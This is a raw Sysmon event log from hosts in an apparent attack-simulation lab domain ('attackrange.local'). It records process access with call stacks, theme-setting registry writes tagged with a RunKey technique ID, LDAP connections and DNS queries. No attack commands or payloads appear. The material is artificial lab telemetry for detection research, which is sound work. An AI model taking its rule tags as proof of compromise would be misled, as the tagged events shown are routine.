09:21:45.061{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055428Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.061{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055427Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.061{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8D29-6151-8B00-00000000FD01}3668C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055426Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.061{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055425Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.061{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055424Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.061{5EBD8912-8CC0-6151-0F00-00000000FD01}3002836C:\Windows\System32\svchost.exe{5EBD8912-8D29-6151-8B00-00000000FD01}3668C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\termsrv.dll+47f71|c:\windows\system32\termsrv.dll+1982c|c:\windows\system32\termsrv.dll+2320b|c:\windows\system32\termsrv.dll+22643|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 154100x80000000000000001055423Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.056{5EBD8912-8D29-6151-8B00-00000000FD01}3668C:\Windows\System32\rdpclip.exe10.0.14393.3503 (rs1_release.200131-0410)RDP Clipboard MonitorMicrosoft® Windows® Operating SystemMicrosoft Corporationrdpclip.exerdpclipC:\Windows\system32\ATTACKRANGE\Administrator{5EBD8912-8D28-6151-085E-080000000000}0x85e082HighMD5=D887E718FB0F4C99B9F01C5BD59F8B90,SHA256=ACFA1128B4EDD953F6364FA6216337A59C0522A01349263A11259A827838A56F,IMPHASH=5A464814303942D42A66B561CF697F26{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k termsvcs 10341000x80000000000000001055422Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.045{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 13241300x80000000000000001055421Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT1060,RunKeySetValue2021-09-27 09:21:45.045{5EBD8912-8D28-6151-8A00-00000000FD01}620C:\Windows\system32\TSTheme.exeHKU\S-1-5-21-2741910449-3045839080-4200281267-500\Remote\2\Control Panel\Desktop\UserPreferencesMaskBinary Data 13241300x80000000000000001055420Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT1060,RunKeySetValue2021-09-27 09:21:45.045{5EBD8912-8D28-6151-8A00-00000000FD01}620C:\Windows\system32\TSTheme.exeHKU\S-1-5-21-2741910449-3045839080-4200281267-500\Remote\2\Control Panel\Desktop\SmoothScrollNo 13241300x80000000000000001055419Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT1060,RunKeySetValue2021-09-27 09:21:45.045{5EBD8912-8D28-6151-8A00-00000000FD01}620C:\Windows\system32\TSTheme.exeHKU\S-1-5-21-2741910449-3045839080-4200281267-500\Remote\2\Control Panel\Desktop\WindowMetrics\MinAnimate0 10341000x80000000000000001055418Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.030{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8D28-6151-8A00-00000000FD01}620C:\Windows\system32\TSTheme.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055417Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.030{5EBD8912-8CC0-6151-1600-00000000FD01}12961780C:\Windows\system32\svchost.exe{5EBD8912-8D28-6151-8A00-00000000FD01}620C:\Windows\system32\TSTheme.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055416Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.030{5EBD8912-8CC0-6151-1600-00000000FD01}12961336C:\Windows\system32\svchost.exe{5EBD8912-8D28-6151-8A00-00000000FD01}620C:\Windows\system32\TSTheme.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055415Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.030{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D95F3D743C6BF35A5D4E976E53F37D9,SHA256=4401D73D3D9BC9D57C9C646EE502E3EE3C131039FF11C10F94EC0091DC41945A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055414Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.014{5EBD8912-8D26-6151-8500-00000000FD01}27602120C:\Windows\system32\csrss.exe{5EBD8912-8D28-6151-8A00-00000000FD01}620C:\Windows\system32\TSTheme.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 23542300x80000000000000001055413Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.999{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D1E2D55C86A4E03F252CA828339FB82,SHA256=146D67EF20696FC943E15AD6443F2DD24CD2CF1ED4F7ABCC80939C27BDFF9BC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980878Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:46.744{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9780C6213394D22A4796C85EC37198E,SHA256=82D4F9B016C1F24A77E164250B34B443A75593F4906C109C92B3A88F4DA9ED6C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055660Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.852{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055659Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.852{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055658Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.852{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055657Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.852{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055656Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.852{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055655Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.852{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001055654Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.827{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-429.attackrange.local54204-false10.0.1.14win-dc-429.attackrange.local389ldap 354300x80000000000000001055653Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.827{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54204-false10.0.1.14win-dc-429.attackrange.local389ldap 354300x80000000000000001055652Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.822{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local54203-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001055651Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.822{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local54203-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001055650Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.816{5EBD8912-8CBF-6151-0D00-00000000FD01}900C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local54202-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local135epmap 354300x80000000000000001055649Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.816{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local54202-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local135epmap 22542200x80000000000000001055648Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.322{5EBD8912-8CD0-6151-2600-00000000FD01}2944WIN-DC-4290fe80::65e5:9cae:dd2b:361b;C:\Windows\System32\spoolsv.exe 22542200x80000000000000001055647Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.322{5EBD8912-8CD0-6151-2600-00000000FD01}2944WIN-DC-429010.0.1.14;C:\Windows\System32\spoolsv.exe 22542200x80000000000000001055646Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.966{5EBD8912-8CD0-6151-2600-00000000FD01}2944WIN-DC-4290fe80::65e5:9cae:dd2b:361b;::ffff:10.0.1.14;C:\Windows\System32\spoolsv.exe 10341000x80000000000000001055645Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.743{5EBD8912-8D29-6151-8F00-00000000FD01}42404312C:\Windows\system32\taskhostw.exe{5EBD8912-8D2A-6151-9700-00000000FD01}4736C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055644Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.743{5EBD8912-8D29-6151-8F00-00000000FD01}42404312C:\Windows\system32\taskhostw.exe{5EBD8912-8D2A-6151-9700-00000000FD01}4736C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055643Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.663{5EBD8912-8D29-6151-8C00-00000000FD01}34084044C:\Windows\System32\RuntimeBroker.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+8addb|C:\Windows\System32\combase.dll+8c2d2|C:\Windows\System32\combase.dll+39b93|C:\Windows\System32\combase.dll+8c4dd|C:\Windows\System32\combase.dll+37f4c|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001055642Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.663{5EBD8912-8D29-6151-8C00-00000000FD01}34084044C:\Windows\System32\RuntimeBroker.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+8addb|C:\Windows\System32\combase.dll+8c2d2|C:\Windows\System32\combase.dll+39b93|C:\Windows\System32\combase.dll+8c4dd|C:\Windows\System32\combase.dll+37f4c|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 